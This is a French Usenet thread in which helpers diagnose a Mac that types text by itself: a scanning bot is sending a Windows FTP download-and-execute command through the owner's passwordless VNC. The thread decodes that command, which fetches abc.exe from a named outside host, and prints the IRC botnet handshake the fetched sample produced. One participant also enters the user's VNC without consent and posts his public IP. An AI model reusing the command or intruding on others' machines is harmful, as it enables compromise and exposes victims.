Un Virus ?

RiGuad

Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :

(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

Eric Levenez

Le 2/03/07 18:41, dans <45e861d4$0$5112$ba4a...@news.orange.fr>, « RiGuad »
<RiG...@KkBoodin.wanadoo.fr> a écrit :

> [...]
> c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
> èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v

Tout cela ressemble a ce que l'on envoie pour établir une session ftp (avec
un clavier QWERTY) et récupérer un exécutable windows :

open ftp.hypermart.net
user joh joh
binary
get abc.exe

Le site que le soft qui tape ton code clavier est donc : hypermart.net

> [...]
> "prend la main" sur tout ce que je peux faire , y compris debrancher le
> clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres

As-tu un fichier dans le répertoire ~/Library/InputManagers ?

Nina Popravka

On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>(syste,root(`syste,"é`c,d:exe
>c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
>èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
>)smik èdel ik èqbc:exe èexit

C'est très drôle...
Y a bien un user joh sur ftp.hypermart.net, pass joh...
Mais pas de abc.exe à ramener :-)
--
Nina

Nina Popravka

On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Le plus insupportable est lorsque l'on tchatte avec un ami,

Tu utilises IRC ?
--
Nina

Eric Levenez

Le 2/03/07 19:00, dans <sgpgu2ht5nei1kspq...@4ax.com>, « Nina
Popravka » <Nina@nospam> a écrit :

Juste un MP3.

Nina Popravka

On Fri, 02 Mar 2007 19:18:41 +0100, Eric Levenez <ne...@levenez.com>
wrote:

>Juste un MP3.

Même pas taggé et genre latino, assez marrant...
--
Nina

Fra

Nina Popravka <Nina@nospam> wrote:

Y'a peut être des informations à Ben Laden de cachés dedans pour qu'un
gars essaie d'un aller par des moyens détournés.
--
Fra

Message has been deleted

Nina Popravka

On Fri, 02 Mar 2007 22:30:06 +0100, Le Moustique
<lemo...@freesurf.fr> wrote:

>Ah, moi j'ai trouvé un VNC.exe... mais 40 Ko, ça me semble un peu mince.

Ah...
Lui, d'après certains AVs, c'est un bot IRC.
MacAfee, Symantec et Clamav ne voient rien, comme d'hab, tout comme
Avast et AVG, d'ailleurs.
Allez hop, direction la machine de test, je vais le regarder un peu
vivre demain au petit déj :-))))))))
--
Nina

RiGuad

Oui, j'utilise IRC..

Bon , merci les gars de vos remarques, mais..

1-Comment cette ... "fonction" a t elle pu , toute seule ! , se créer
sur mon Imac G5 ?
2- Comment arreter ce truc ?
3- c'est la premiere fois en 20 ans que mon Mac décide pour moi de ce
qui apparait en texte sur mon ecran, et cela m'inquiete beaucoup. S'il
est capable d'ecrire tout seul, il peut etre capable d'effacer ou de
transmettre mes fichiers tout seul ?
Tout cela est tres flippant.

Euh... Nina , peux tu expliquer ton message précedent... ?

Nina Popravka

On Fri, 02 Mar 2007 18:26:45 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

> S'il
>est capable d'ecrire tout seul,

Ca n'est pas lui qui écrit, c'est quelqu'un, et quelqu'un qui utilise
un clavier qwerty. Et qui donne l'ordre de récupérer des fichiers sur
un FTP où je viens de trouver un ravissant virus.

>Euh... Nina , peux tu expliquer ton message précedent... ?

Tu dis que tu chattes, je te demande si tu utilises IRC pour le faire.
Parce que de nombreuses saloperies utilisent des canaux IRC pour
contrôler des machines, et le virus que j'ai trouvé est précisément,
je crois (je l'ai pas encore etsté), de cette race.
Donc si tu utilises IRC, il est possible que tu sois tombé sur un truc
comme ça par hasard. Je ne pense d'ailleurs pas que ça puisse avoir la
moindre action sur ta machine.

M'enfin aussi longtemps que tu ne diras pas exactement *où* les
caractères fantômes apparaissent, et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce
soit.
En tout cas, c'est assez amusant et mystérieux comme phénomène, ça
m'intrigue...
--
Nina

RiGuad

Nina Popravka a écrit :

> On Fri, 02 Mar 2007 18:26:45 -0400, RiGuad

> Donc si tu utilises IRC,
Oui tootafé, tant MSN, avec aMSN que les canaux d'IRC, avec Snak avec
lequel je suis courrament sur Irc.Voila.fr.

> M'enfin aussi longtemps que tu ne diras pas exactement *où* les
> caractères fantômes apparaissent,

Ces caracteres prennent la main dans n'importe quelles appli, a
n'importe quel moment, avec par exemple une page AppleWorks vierge ouverte.
C'est d'ailleurs comme ca que j'ai pu le faire ecrire ce que je vous ai
envoyé. suis parti au boulot, en laissant mon curseur sur une page de
traitement de texte vierge
Mon Mac était alors connecté au Net.

et que ne feras pas un netstat -a,
> puis posteras le résultat ici, ça sera difficile de dire quoi que ce
> soit.

Dis moi comment faire ca , stp.

Nina Popravka

On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Mon Mac était alors connecté au Net.

Avec un machin IRC lancé en tâche de fond ?

>et que ne feras pas un netstat -a,
>Dis moi comment faire ca , stp.

Terminal, netstat -a
Le résultat a cette tronche :
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 localhost.6010 *.* LISTEN
tcp6 0 0 localhost.6010 *.* LISTEN
tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614
ESTABLISHED

etc etc etc...

La deuxième partie, genre :
Active LOCAL (UNIX) domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
1db9000 stream 0 0 0 1db9330 0 0
1db9330 stream 0 0 0 1db9000 0 0
1db94c8 stream 0 0 0 1db9550 0 0
/var/run/mDNSResponder
1db9550 stream 0 0 0 1db94c8 0 0
1db95d8 stream 0 0 0 1db96e8 0 0
/var/run/mDNSResponder

c'est pas la peine de la mettre. Enfin perso je ne sais pas quoi en
faire.
--
Nina

RiGuad

Bon...tu l'auras voulu...lol... je te met ce que j'ai obtenu par ta
commande du terminal :

Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)

tcp4 0 0 localhost.smtp *.* LISTEN
tcp4 0 0 192.168.0.21.52534 news-reader.wana.nntp
ESTABLISHED
tcp4 0 0 192.168.0.21.52533 news-reader.wana.nntp
ESTABLISHED
tcp4 0 0 192.168.0.21.52343 by1msg2145209.ph.msnp
ESTABLISHED
tcp4 0 0 192.168.0.21.5900 .50938
ESTABLISHED
tcp4 0 0 192.168.0.21.52151 by1msg4082117.ph.msnp
CLOSE_WAIT
tcp4 0 0 192.168.0.21.5900 .34683
ESTABLISHED
tcp4 0 0 *.63251 *.* LISTEN
tcp4 0 0 *.62234 *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.svrloc *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.afpovertcp *.* LISTEN
tcp46 0 0 *.afpovertcp *.* LISTEN
tcp4 0 0 localhost.47807 *.* LISTEN
tcp4 0 0 *.5901 *.* LISTEN
tcp46 0 0 *.5901 *.* LISTEN
tcp4 0 0 *.ipp *.* LISTEN
tcp4 0 0 *.5900 *.* LISTEN
tcp46 0 0 *.5900 *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 192.168.0.21.commplex- *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 localhost.netinfo-loca localhost.1017
ESTABLISHED
tcp4 0 0 localhost.1017 localhost.netinfo-loca
ESTABLISHED
tcp4 0 0 localhost.netinfo-loca localhost.1021
ESTABLISHED
tcp4 0 0 localhost.1021 localhost.netinfo-loca
ESTABLISHED
tcp4 0 0 localhost.netinfo-loca *.* LISTEN
tcp4 0 0 *.printer *.* LISTEN
tcp6 0 0 *.515 *.* LISTEN
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.svrloc *.*
udp4 0 0 *.* *.*
udp4 0 0 *.ipp *.*
udp4 0 0 localhost.49162 localhost.1022
udp4 0 0 localhost.49161 localhost.1022
udp4 0 0 localhost.1022 *.*
udp4 0 0 localhost.49158 localhost.1023
udp4 0 0 localhost.1023 *.*
udp4 0 0 192.168.0.21.ntp *.*
udp4 0 0 localhost.ntp *.*
udp4 0 0 *.ntp *.*
udp4 0 0 192.168.0.21.49155 *.*
udp4 0 0 *.mdns *.*
udp6 0 0 *.5353 *.*
udp6 0 0 *.5353 *.*
udp4 0 0 *.mdns *.*
udp4 0 0 localhost.netinfo-loca *.*

Merci de me dire ce que cela t'apprend. moi j'y reconnais mon IP interne.
Les nombres apres "localhost", sont ce mes ports ouverts ?

RiGuad

Nina Popravka a écrit :

> Avec un machin IRC lancé en tâche de fond ?

ben si tu estimes que le réseau MSN trafique sous protocole IRC, ce dont
je doute, : oui

Mon aMSN est toujours connecté, effectivement.
Mais si je ne me trompe , MSN a son propre protocole fermé propre a
Microsoft, non ?

Par contre se connecter avec Snak, ou MIRC pour les pceiste sur des
canaux genre Ircnet ou efnet, etc... releve bien du protocole IRC,
contrairement aux protocoles fermés de messagerie propriétaire genre MSN
ou Yahoo ou AIM, etc...

suis je dans l'erreur ?

Jacques Foucry

Nina Popravka <Nina@nospam> wrote:

> En tout cas, c'est assez amusant et mystérieux comme phénomène, ça
> m'intrigue...

Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté
dès la mise en circulation ou par un téléchargement quelconque en DCC
par exemple non ?

Jacques
--
« Mac OS X Server à votre Service » en vente au Monde en Tique.
<http://www.lmet.fr/fiche.cgi?_ISBN=9782952726603>

Nina Popravka

On Sat, 3 Mar 2007 09:29:09 +0100, jac...@foucry.net (Jacques Foucry)
wrote:

>Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté
>dès la mise en circulation ou par un téléchargement quelconque en DCC
>par exemple non ?

Le truc est du à un virus parfaitement classique, qui installe un
backdoor qui permet de contrôler la bécane via IRC.
T'as un doc intéressant là :
<http://honeynet.org/papers/trans/Les-botnets.doc>

C'est très improbable qu'il existe des virus de ce type sur Mac
(koike...).
En revanche, ce qui est curieux, c'est que dans son histoire, ça
ressemble à un truc de contrôle à distance genre VNC.
Ou une faille de son logiciel?
--
Nina

Nina Popravka

On Sat, 03 Mar 2007 00:13:29 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>CLOSE_WAIT
>tcp4 0 0 192.168.0.21.5900 .34683
>ESTABLISHED

>tcp4 0 0 *.5901 *.* LISTEN
>tcp46 0 0 *.5901 *.* LISTEN

>tcp4 0 0 *.5900 *.* LISTEN
>tcp46 0 0 *.5900 *.* LISTEN

Tu te fous de qui ?
Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton
pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et
sans mot de passe.
Tu as de la chance qu'il ne te soit rien arrivé de plus grave que
quelques bricolesà l'écran.
On y croit pas...
--
Nina

Message has been deleted

arno

Benoit Leraillez <benoit....@leraillez.sansspam.com> wrote:

> Juste un truc la Nina : où as-tu récupérer son adresse IP publique
> pour faire tout ça ? Parce que moi je ne vois que du 192.168.0.21 et
> là...

Les entêtes de ses messages...

--
arno

Frédérique & Hervé Sainct

> [...]

> sans mot de passe.
> Tu as de la chance qu'il ne te soit rien arrivé de plus grave que

chapeau...

--
Frédérique & Hervé Sainct, h.sa...@laposte.net [fr,es,en,it]

Nina Popravka

On Sat, 3 Mar 2007 11:31:36 +0100, jo...@facmed.u-nancy.fr (arno)
wrote:

>Les entêtes de ses messages...

Voilà...
Tout le NG mort de rire doit être en train de visiter son Mac :-)
--
Nina

Message has been deleted

arno

Benoit Leraillez <benoit....@leraillez.sansspam.com> wrote:

> J'y pensais, mais comme mamadoo ne fait pas de l'IP fixe et que rien
> ne dit qu'il n'est pas sous modem et non ADSl...

Quelqu'un qui dit laisser touner aMSN en permanence et qui aurait une
connexion RTC... c'est tout de même peu probable.
Et s'il reste connecté en permanence, il garde son IP au moins 24H,
souvent bien plus.

>je me demandais si elle
> avait une autre piste. Parce que la Nina elle a un flair comac.

Pas besoin de sortir le marc de café où les viscères de poulet pour y
lire l'adresse IP quand elle apparait en clair :)

--
arno

arno

Nina Popravka <Nina@nospam> wrote:

C'est toi qui a commencé à lui demander de fournir en public le plan
d'accès à sa maison...
qu'il ait laissé les clés sur la porte, c'est un plus :)

--
arno

Message has been deleted

RiGuad

Bon, donc , en recap a mon constat d'origine, ca n'aurait pas été le Mac
qui est infecté mais quelqu'un qui tapait en direct cette ligne de
commande que j'ai envoyé dans mon post d'origine, et ceci par l'acces VNC ?
Dans ce cas comment mon IP publique du moment est elle connue ?

RiGuad

ah ok, l'IP est ecrite en clair dans l'en tete des messages envoyés sur NG.
L'Ip publique d'un emetteur est elle toujours inscrite dans l'entete
d'un mail recu ?

Je decouvre...

Mais cette IP changeant toutes les 24 h environ , le rigolo qui aurait
tapé cette ligne en entrant par mon VNC ouvert connaitrait mon IP
publique comment ?

RiGuad

oui, deux dossier : "Ecamm" contenau des ucs que je crois etre en rapprt
avec l'enregisrement des conversations telephoniques via Skype, et un
autre "Growl Safari"

> As-tu un fichier dans le répertoire ~/Library/InputManagers ?

Nina Popravka

On Sat, 03 Mar 2007 09:53:43 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Mais cette IP changeant toutes les 24 h environ , le rigolo qui aurait
>tapé cette ligne en entrant par mon VNC ouvert connaitrait mon IP
>publique comment ?

Mais bordel...
Personne ne t'en veut particulièrement.
Simplement des milliers de robots scannent à longueur de journée les
bécanes situées sur les réseaux de FAIs grand public à la recherche de
failles, une des plus belles étant un serveur VNC sans passe, chose
exclusivement due à l'inconscience de l'interface chaise-clavier.
Tu as un Mac, donc ce que t'envoie le robot ne fait pas ce qu'il
devrait faire : te faire ramener et exécuter une merde. A la place le
script s'affiche.
Ca le fera le jour où les virus seront bi-plateformes, et de toute
manière pour s'en protéger suffit de ne plus être inconscient.
--
Nina

Nina Popravka

On Sat, 3 Mar 2007 11:48:22 +0100, jo...@facmed.u-nancy.fr (arno)
wrote:

>qu'il ait laissé les clés sur la porte, c'est un plus :)

Il a d'ailleurs toujours les fesses à l'air, ce qui donne à penser
qu'il n'a pas encore percuté.
Je resterai stoïque.
;->>>>
--
Nina

RiGuad

Nina Popravka a écrit :

> [...]
> bécanes situées sur les réseaux de FAIs grand public à la recherche de
> failles, une des plus belles étant un serveur VNC sans passe,

Ok, donc VNC quitté.
Quelle url est envoyée pour acceder ainsi au Mac, sachant que mon port
VNC n'etait pas mappé au niveau de mon modem routeur ?
Parce que moi je ne suis jamais arrivé a entrer dans mon Mac domicile a
distance via justement VNC depuis mon Mac Bureau a partir de Chiken of
the VNC .

Je tapais l'url suivante : XXX.XXX.XXX.XXX:YYYY ou Y est l'adresse IP
publique, et Y le port VNC, et ca ne marchait pas.
Faut il inclure l'IP privée et sous quelle forme ?

Merci

Nina Popravka

On Sat, 03 Mar 2007 17:50:56 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Ok, donc VNC quitté.
>Quelle url est envoyée pour acceder ainsi au Mac, sachant que mon port
>VNC n'etait pas mappé au niveau de mon modem routeur ?

Heu... 80.8.75.191 dans le client VNC ?
Ou 80.8.75.191:5900

>Parce que moi je ne suis jamais arrivé a entrer dans mon Mac domicile a
>distance via justement VNC depuis mon Mac Bureau a partir de Chiken of
>the VNC .

M'étonne pas... y a un problème de profondeur de couleur sur le Mac.
La fenêtre s'ouvre furtivement et se referme aussi sec. Je n'y arrive
qu'avec TightVNC (sur PC). Pas mal galéré là-dessus.

>Faut il inclure l'IP privée et sous quelle forme ?

Nan... mais y a un truc zarb chez toi, ça fait 50 mn que nmap scanne,
et il est pas rendu.
--
Nina

RiGuad

Nina Popravka a écrit :
Ben depuis , j'ai changé d'IP, j'ai quitté VNC, et demandé a NetBarrrier
de bloquer connexion entrante venant de 82.224.20.184, c'est ptet en
rapport ?

Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
connexion entrante tcp port 13517, et parfois 1080.
Ces ports sont dédiés a quoi ?
Idem plus rarement connexion entrante TCP Microsoft SQL Server et
connexion entrante TCP SMB/CIFS - Windows file service.
Qu'est ce ?.

D'une facon générale , doit je bloquer toute tentative de connexion
entrante au sens ou NetBarrier l'entend ?

Little Snitch m'informe des connexions sortantes de mon Mac, et c'est
d'ailleurs la que j'ai decouvert que Mon Mac et Crosoft tchattaient
grave a mon insu.
Mais Des connexions entrante honnetes, ca peut etre quoi ?

Nina Popravka

On Sat, 03 Mar 2007 19:57:00 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Ben depuis , j'ai changé d'IP, j'ai quitté VNC, et demandé a NetBarrrier
>de bloquer connexion entrante venant de 82.224.20.184, c'est ptet en
>rapport ?

Si ton Mac est réglé comme étant en DMZ au niveau de ton routeur, oui.
Et il n'a rien à foutre en DMZ.

> [...]
>Idem plus rarement connexion entrante TCP Microsoft SQL Server et
>connexion entrante TCP SMB/CIFS - Windows file service.

Le bruit de fond d'internet. Des robots qui scannent inlassablement à
la recherche de failles. Ca doit bien représenter la moitié du
traffic.
Sauf le 13517 qui doit avoir un rapport avec un truc de chat
quelconque.

>D'une facon générale , doit je bloquer toute tentative de connexion
>entrante au sens ou NetBarrier l'entend ?

Vois pas l'intérêt de NetBarrier quand on a un routeur.
--
Nina

Jacques Foucry

> [...]

> Le truc est du à un virus parfaitement classique, qui installe un
> backdoor qui permet de contrôler la bécane via IRC.

J'irais lire ça lundi du boulot :-)

Merci Nina.

JPaul

Nina Popravka <Nina@nospam> wrote:

> T'as un doc intéressant lą :
> <http://honeynet.org/papers/trans/Les-botnets.doc>

Trčs intéressant. Merci.

JPaul.
--
/==/==\\-\ Jean-Paul BLANC
/ /--/--//\\ quelque-part (somewhere)
|/| L |\\\ en (in)
\/|| = |||\\\ FRANCE

Jacques Perrocheau

RiGuad <RiG...@KkBoodin.wanadoo.fr> wrote:

> Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
> connexion entrante tcp port 13517, et parfois 1080.
> Ces ports sont dédiés a quoi ?

<http://www.iana.org/assignments/port-numbers>

La page officielle.

> [...]
> grave a mon insu.
> Mais Des connexions entrante honnetes, ca peut etre quoi ?

Plutôt que d'installer des multiples couches de préservatifs, plus ou
moins facile à paramétrer, tu pourrais simplement activer le firewall de
Mac OS X, au cas où tu utilises l'Airport. Dans ton cas le plus
important est de paraméter le firewall de ton routeur.

--
Jacques PERROCHEAU
e-mail: mailto:jperr...@mac.com

JPaul

Jacques Perrocheau <jperr...@mac.com.invalid> wrote:

> <http://www.iana.org/assignments/port-numbers>
>
> La page officielle.

Oui, mais 13517 fait partie des "unassigned" :-(

Nina Popravka

On Sun, 4 Mar 2007 19:05:27 +0100, bl...@empty.org (JPaul) wrote:

>Oui, mais 13517 fait partie des "unassigned" :-(

Et 1080 est assigned, mais en fait utilisé par quantité de backdoors.
Il est dans le top 10 du bruit de fond.
De nos jours, c'est pas passionnant de savoir à quoi un port est
assigné offciellement, vaut mieux s'intéresser à ce qui se passe
vraiment dessus :-)
--
Nina

RiGuad

Je voudrais remercier tout le monde des informations transmises ici et
qui m'ont beaucoup instruit.
En particulier le temps que m'a accordé Nina qui ... s'il est certain
que sa maniere de s'exprimer se veut resolument antipédagogique, m'a
permi de comprendre bien des choses inquietantes pour certaines.
Merci de comprendre aussi que l'usage du Net est grand public, et que si
l'usage de Mac OS et du Net me passionne, je ne suis pas un Professionel
mais un Macounet qui veut comprendre, d'ou mes questions qui ont du
paraitre betes a certains..., et que les concepts et termes que vous
employez, s'ils demontrent vos compétences en la matière ont bien des
recherches de ma part pour simplement en comprendre le sens.
Les réponses aux questions en amenent une foultitude d'autres, et je ne
voudrais pas mobiliser le Chan entier pour m'instruire, sans doute vais
je chercher un NG moins pointu que celui ci, ou alors ouvrir des Fils
spécifiques a mes questions...
Merci aussi des docs referentiels fournis... l'assignation des ports,
meme si elle n'est que théorique il est vrai, et ce truc sur les
botnets, passionnant.
J'ai decouvert a quel point les ceussent qui ont des pc ont un probleme
de base terrible concernant l'acces a leur machine par n'importe qui, et
je me dis que , entre les Virus connus, ceux qui ne le sont pas, les
bugs logiciels, le merdier Winsoft qui equipe leur machine,
l'incertitude d'un bon usage , etc... il doit etre bien difficile ,
quand on a un pc et qu'on constate un fonctionnement anormal, de savoir
ce qui ne va pas.

TiPunch tropical a tous...

Nicolas MICHEL

> [...]

> Mac OS X, au cas où tu utilises l'Airport. Dans ton cas le plus
> important est de paraméter le firewall de ton routeur.

En plus de ce que tu dis, plein de bon sens dureste, je rapelles que le
problème de base était l'absence de mot de passe.

Et qu'on avait accès à la machine pour - par exemple - y mettre un
keylogger (un truc qui sert entre autre à récupérer les mots de passe).

Selon moi dans un cas comme ça en plus de Little Snitch et du reste,
un reset de tous les mots de passe du mac et tout particulièrement des
mot de passes enregistrés dans le keychain, comme les comptes banquaires
ou itms, s'impose.

Et pour bien faire, ce serait pas mal que les nouveaux passwd soient
sérieux. Perso j'utilises pwgen pour générer des mots de passe
aléatoires mais n'importe quel password alpha-numérique autre que
Ricardo01 devrait le faire.

--
Nicolas

Nicolas MICHEL

> [...]

> l'usage de Mac OS et du Net me passionne, je ne suis pas un Professionel
> mais un Macounet qui veut comprendre, d'ou mes questions qui ont du

La seule bêtise que tu aies faite était de ne pas mettre de mot de passe
sur VNC.

Les questions ne sont jamais bête et surtout pas les questions que tu
t'es posées dans ce fil. Dureste on a certainement été nombreux à
aprendre des trucs grâce à toi (et aux réponses qui t'on été données)

> et que les concepts et termes que vous
> employez, s'ils demontrent vos compétences en la matière ont bien des
> recherches de ma part pour simplement en comprendre le sens.

Par principe comme par flemme, on ne présuppose pas de niveau de son
interlocuteur quand on réponds. Ce serait présomptueux de notre part.
Et puis un problème technique amène des réponses techniques.
Si tu ne comprends pas un truc, demandes des précisions.

> [...]
> voudrais pas mobiliser le Chan entier pour m'instruire, sans doute vais
> je chercher un NG moins pointu que celui ci, ou alors ouvrir des Fils

Ce forum est le bon endroit pour tes questions.
Dumoins je n'en connais pas de meilleur.
Simplement ça demande effectivement un peu de temps pour analyser les
réponses et les comprendre. Au besoins, je me répète, tu peux demander
des éclairsissements ou même un résumé de ce que tu dois faire pour
régler ton problème.

> J'ai decouvert a quel point les ceussent qui ont des pc ont un probleme
> de base terrible concernant l'acces a leur machine par n'importe qui

Tu veux parler de cet OS, winturc XP stupid home user, qui crée par
défaut un utilisateur "admin" sans mots de passe ?
Bin oui, c'est super sécurisé M$ :>

> [...]
> d'un bon usage , etc... il doit etre bien difficile , quand on a un pc et
> qu'on constate un fonctionnement anormal, de savoir ce qui ne va pas.

Attends, tu ne voudrais tout de même pas enlever le pain de la bouche
des informaticiens en faisant des ordinateurs fiables ?
Dureste, si le grand public n'aimait pas les suprises M$ n'aurait pas
une telles part de marché.

--
Nicolas

Gerald

Nicolas MICHEL <Nicolas...@BonBon.net> wrote:

> [...]
> sérieux. Perso j'utilises pwgen pour générer des mots de passe
> aléatoires mais n'importe quel password alpha-numérique autre que

quelqu'un avait donné ici la chaîne suivant à saisir dans le terminal
pour générer des mots de passe solides et aléatoires

openssl rand -base64 8

...que je trouve bien pratique. Qu'il en soit encore remercié !

--
Gérald

Erwan David

Ger...@alussinan.org (Gerald) écrivait :

Pas si solides que ça : l'alphabet de sortie du base64 est un peu
limité (64 caractères seulement).

--
Erwan

Erwan David

Ger...@alussinan.org (Gerald) écrivait :

Pas si solides que ça : l'alphabet de sortie du base64 est un peu
limité (64 caractères seulement), donc on a ici 2^48 possibilités, ce
qui est faible (en dessous de 2^64 on considère que la force brute est
faisable).

--
Erwan

Nina Popravka

On Mon, 05 Mar 2007 11:12:17 +0100, Erwan David <er...@rail.eu.org>
wrote:

> [...]
>limité (64 caractères seulement), donc on a ici 2^48 possibilités, ce
>qui est faible (en dessous de 2^64 on considère que la force brute est

Oui, sauf qu'il faut pas mélanger les torchons et les serviettes.
Sur des bécanes non sensibles, je préfère avoir un mot de passe pas
très robuste (vu de la fenêtre des Dieux de la crypto qui annoncent
que SHA-1 est faible puisqu'on pourrait le casser en quelques millions
au lieu de milliards d'années) et facilement mémorisable, plutôt qu'un
truc de la mort qui tue imbitable qui donc va traîner partout sur des
post-it ;->>>>>
Les attaques en force brute, c'est quand même réservé à une certaine
élite de cibles. Perso je n'en ai jamais vu, dans la cible d'activité
qui est la mienne.
--
Nina

Nina Popravka

On Mon, 5 Mar 2007 10:41:14 +0100, Nicolas...@BonBon.net (Nicolas
MICHEL) wrote:

>Tu veux parler de cet OS, winturc XP stupid home user, qui crée par
>défaut un utilisateur "admin" sans mots de passe ?

Non accessible de l'extérieur, mais il est vrai que ça facilite
furieusement les intrusions physiques :-)))))

>Bin oui, c'est super sécurisé M$ :>

Tu vas rire, mais quand tu parles de ça sur les NG M$, tu te fais
regarder comme un extra-terrestre par les participants et les MVPs
(MVP = Microsoft Valuable Professional = brave retraité ou étudiant ou
mère de famille utilisateur de Win auquel MS offre un abonnement MSDN,
en échange de son apport de support gratuit sur les ng microsoft.*)
Parce que tu vois, pour eux, au contraire, c'est une sécurité.
Je t'explique : des fois que tu oublierais le pass de ton compte, ben
le compte admin sans mot de pass est là pour te sauver.
Véridique...
--
Nina

Erwan David

Nina Popravka <Nina@nospam> écrivait :

Oui, ça se défend. Mais là le openssl va surtout pas donner un truc
facile à retenir donc le risque que ça traine sur un postit sous le
clavier (pour utilisateur sensibilié, sur l'écran pour utilisateur non
sensibilisé) augmente beaucoup.

--
Erwan

Nina Popravka

On Mon, 05 Mar 2007 13:28:27 +0100, Erwan David <er...@rail.eu.org>
wrote:

> un postit sous le

>clavier (pour utilisateur sensibilié, sur l'écran pour utilisateur non
>sensibilisé) augmente beaucoup.

Et dans le tiroir si la boîte est certifiée Défense ? ;->>>>>
--
Nina

Gerald

> [...]

> facile à retenir donc le risque que ça traine sur un postit sous le
> clavier (pour utilisateur sensibilié, sur l'écran pour utilisateur non

à l'usage (et j'y ai converti quelques proches) au bout de quelques
jours on les retient sans problème et ça devient machinal. Plus
problématique si on choisit d'en changer souvent, mais sinon c'est glop.
Pour ce qui est du niveau de sécurité, je pense que même en ne prenant
que 5 ou 6 caractères (en faisant attention à y inclure des
diacritiques) on est déjà 20000 pieds au-dessus du niveau de sécurité de
99,9% des utilisateurs d'informatique personnelle.
Note que le code confidentiel des cartes bancaires ne comporte que 4
*chiffres* !

Et pour ce qui est du post-it : oui il existe *mais* c'est un fake :-)
juste pour énerver ! (pas totalement fake d'ailleurs mais seulement pour
me remettre sur la voie).

--
Gérald

Nina Popravka

On Mon, 5 Mar 2007 13:59:42 +0100, Ger...@alussinan.org (Gerald)
wrote:

>Note que le code confidentiel des cartes bancaires ne comporte que 4
>*chiffres* !

Note qu'au bout de 3 essais infructueux la carte est avalée, système
qui est d'ailleurs également répandu en informatique sérieuse (compte
désactivé au bout de x logins foirés)
--
Nina

Erwan David

Ger...@alussinan.org (Gerald) écrivait :

> Note que le code confidentiel des cartes bancaires ne comporte que 4
> *chiffres* !

Certes, mais au bout de 3 essais ratés => carte bloquée...

--
Erwan

Message has been deleted

Nina Popravka

On Mon, 5 Mar 2007 15:48:31 +0100,
benoit....@leraillez.sansspam.com (Benoit Leraillez) wrote:

> Absolument, c'est le cas sur OS400.
Tout le monde le fait. Pour parler de ce que je connais, NT depuis NT4
au moins.

>Par contre OS X rallonge le
>délai entre deux tentatives
Ca, c'est la méthode LotusNotes,et ça devient rapidement
trèèèèèèèèèsssss long :-)
--
Nina

Nina Popravka

Et pour clore le sujet, je viens de m'infecter pas à l'insu de mon
plein gré du tout avec un des trucs trouvés sur le FTP en question.
Dans la seconde qui suit le lancement du programme (qui n'était hier
pas reconnu par la majorité des anti-virus), ma bécane va causer à un
japonais et ils se racontent ça :

NICK L1-tn0o
USER yakrtfqjm "fo9.net" "lol" :yakrtfqjm

:expozed.gov 001 L1-tn0o :Welcome to the Internet Relay Chat Network, L1-tn0o
:expozed.gov 002 L1-tn0o :Your host is expozed.gov, running version 1.2.1546
:expozed.gov 003 L1-tn0o :This server was created Mar 1 2007 at 05:34:54 g( (Serial # 00-00-00)
:expozed.gov 004 L1-tn0o expozed.gov IRCXPRO1.2 acdefghiknoprstwxyzACEFGIJLPRS abdefghijklmnopqrstuvwxyzACEFIKLMOPT
